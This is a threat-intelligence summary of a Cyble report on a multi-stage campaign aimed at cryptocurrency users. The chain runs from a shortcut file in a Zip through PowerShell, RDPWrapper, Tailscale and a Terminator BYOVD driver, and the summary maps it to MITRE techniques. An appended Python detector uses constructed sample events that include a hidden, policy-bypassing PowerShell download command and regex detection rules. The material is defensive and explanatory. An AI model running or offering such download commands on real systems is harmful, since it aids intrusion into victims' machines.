New Malware Campaign Abusing RDPWrapper and Tailscale to Target Cryptocurrency Users 

Cyble Research and Intelligence Labs (CRIL) uncovered a multi-stage campaign that starts with a Zip file containing a malicious shortcut (.lnk) which, when opened, downloads a PowerShell payload that ultimately grants RDP access. The threat actor uses RDPWrapper and Tailscale to reach the victim’s network, plans a Windows BYOVD attack with Terminator, and drops a Go-based loader alongside a decoy PDF about Indian crypto trading to target cryptocurrency users. #Terminator #Tailscale

Keypoints

  • Campaign begins with a Zip file containing a malicious .lnk shortcut; execution by the user triggers the attack chain.
  • Executing the shortcut downloads a PowerShell script that ultimately provides the Threat Actor (TA) with RDP access to the victim’s system.
  • Infection chain includes PowerShell, batch files, Go-based binaries, and a BYOVD-capable Terminator driver (Spyboy).
  • TA plans a Windows BYOVD attack using Terminator.sys and Zemana kernel drivers, potentially enabling AV/EDR bypass.
  • RDPWrapper and Tailscale are used to establish remote access and connect to the TA’s private network.
  • Decoy PDFs (CoinDCX-related) indicate a crypto-focused target, with India as a geographic focus; same decoy linked to StealC chain.
  • Loader chain drops binaries, performs registry and UAC checks, and uses mutexes to ensure single-instance execution.

MITRE Techniques

  • [T1204] User Execution – The .lnk file requires the user to execute it.
  • [T1059] Command and Scripting Interpreter – Uses PowerShell and Batch scripts.
  • [T1547.001] Registry Run Keys / Startup Folder – Creates a start menu entry (Start Menu\Programs\Startup).
  • [T1133] External Remote Services – Uses Tailscale and RDPWrapper.
  • [T1548] Abuse Elevation Control Mechanism – Bypasses User Account Control.
  • [T1134.001] Access Token Manipulation – Uses the runas command.
  • [T1027] Obfuscated Files or Information – Uses an XOR-encrypted PowerShell script.
  • [T1070.004] Indicator Removal on Host – Deletes the batch script.
  • [T1057] Process Discovery – Queries a list of all running processes.
  • [T1518.001] Security Software Discovery – May try to detect a virtual machine to hinder analysis.
  • [T1219] Remote Access Software – Uses RDPWrapper and Tailscale.
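Detection logic for the chain described above, as an added example that is not part of the Cyble report: it matches constructed, simplified process/driver/file events (a key=value format, not real Sysmon output) against the stages the summary names, and only alerts when several stages co-occur on one host, since any single indicator (a Tailscale install, a PowerShell download) is common on its own.

```python
import re

# Constructed sample events, one per stage of the reported chain, plus a benign one.
# Paths and the download host are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    "type=process image=C:\\Windows\\explorer.exe cmd=\"C:\\Users\\u\\Downloads\\invoice.zip\\Statement.lnk\"",
    "type=process image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "cmd=\"powershell -w hidden -ep bypass -c iwr hxxps://placeholder.invalid/x.txt\"",
    "type=driverload image=C:\\Users\\Public\\Terminator.sys signer=unknown",
    "type=process image=C:\\ProgramData\\rdpwrap\\RDPWInst.exe cmd=\"RDPWInst.exe -i\"",
    "type=process image=C:\\Program Files\\Tailscale\\tailscale.exe cmd=\"tailscale up --authkey <placeholder>\"",
    "type=filecreate path=C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk",
    "type=process image=C:\\Windows\\System32\\notepad.exe cmd=\"notepad.exe\"",
]

# Each rule names one stage of the chain (T1204, T1059, BYOVD driver load, T1219/T1133, T1547.001).
RULES = [
    ("lnk_from_archive", re.compile(r"type=process .*\.zip\\\S*\.lnk", re.I)),
    ("powershell_hidden_download", re.compile(r"powershell\.exe .*(-w(indowstyle)? hidden|-ep bypass)", re.I)),
    ("terminator_driver_load", re.compile(r"type=driverload .*\\terminator\.sys", re.I)),
    ("rdpwrapper_install", re.compile(r"\\rdpw(inst|rap)[^\\]*\.(exe|dll)", re.I)),
    ("tailscale_join", re.compile(r"\\tailscale\.exe .*\btailscale up\b", re.I)),
    ("startup_folder_lnk", re.compile(r"type=filecreate .*\\Start Menu\\Programs\\Startup\\.*\.lnk", re.I)),
]


def match_stages(events):
    """Return the ordered, de-duplicated list of chain stages observed in the events."""
    seen = []
    for line in events:
        for stage, pattern in RULES:
            if pattern.search(line) and stage not in seen:
                seen.append(stage)
    return seen


def chain_verdict(events, min_stages=2):
    """Alert only when at least `min_stages` distinct stages appear together.

    Remote-access tooling alone is often legitimate; its combination with a
    shortcut-launched hidden PowerShell download or an unsigned Terminator.sys
    driver load is what makes this chain stand out.
    """
    stages = match_stages(events)
    return {"stages": stages, "alert": len(stages) >= min_stages}


if __name__ == "__main__":
    print(chain_verdict(SAMPLE_EVENTS))
```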

Indicators of Compromise

Read more: https://cyble.com/blog/new-malware-campaign-abusing-rdpwrapper-and-tailscale-to-target-cryptocurrency-users/